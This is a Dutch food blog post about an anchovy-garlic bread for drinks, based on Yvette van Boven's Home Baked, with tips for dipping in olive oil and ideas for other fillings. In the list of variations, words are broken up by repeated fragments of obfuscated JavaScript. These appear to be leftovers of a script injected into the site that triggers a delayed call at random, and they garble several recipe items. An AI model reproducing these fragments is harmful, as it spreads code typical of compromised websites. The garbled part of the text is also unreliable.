Dit heerlijk kruidig ansjovis- knoflookbrood voor bij de borrel is naar een recept van Yvette van Boven uit haar boek Home Baked. Persoonlijk één van mijn favoriete kookboeken, een echte aanrader. Het brood heeft een heerlijke Italiaanse smaak en is echt fantastisch met een goed glas wijn. Het leuke is dat je het brood gewoon in een cakeblik kan maken. Super eenvoudig dus!
Yvette van Boven, Home Baked.
Een heerlijk kookboek voor thuisbakkers vol leuke bakrecepten. Persoonlijk ben ik vooral fan van dit boek vanwege de prettige schrijfstijl en handige tips. Veel kookboeken zijn leuk om doorheen te bladeren, maar deze is ook erg leuk om echt te lezen! In dit boek staan naast dit recept ook veel broodrecepten, koekjes en taarten. Erg leuk als je net als ik van bakken houdt!
Dippen met olijfolie
Het ansjovis- knoflookbrood is van zichzelf al super lekker. Vooral als je het in hele dunne plankjes serveert. Je hoeft er eigenlijk niets meer op te doen. Je kunt als je het wil het brood wel nog een beetje dippen in wat goede olijfolie. Zelf gebruik ik hier altijd een knoflook- of gember rasp voor van aardewerk. Ik geloof dat ik deze ooit bij de Dille&Kamille heb gekocht, maar ze hebben ze ook bij de Xenos. Je kunt hier een teentje knoflook over de bodem fijn raspen en er vervolgens wat goede olijfolie en wat zeezout over heen doen.
Variatie Tip
Je kunt er natuurlijk ook voor kiezen om een ander kruiden mengsel te maken in plaats van knoflook en ansjovis. Je houdt het basisrecept voor het deeg gewoon aan zoals hieronder beschreven, maar vervolgens verreik je het met de dingen die jij lekker vindt! Wat dacht je van de volgende borrelbrood variaties?
- dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/”>Walnootpesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to
- Zongedroogde dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten en basilicum
- Vijgen en pijnboompitten
- Artisjokken en kappertjes
Geen Reacties op "Ansjovis- Knoflookbrood voor bij de borrel!"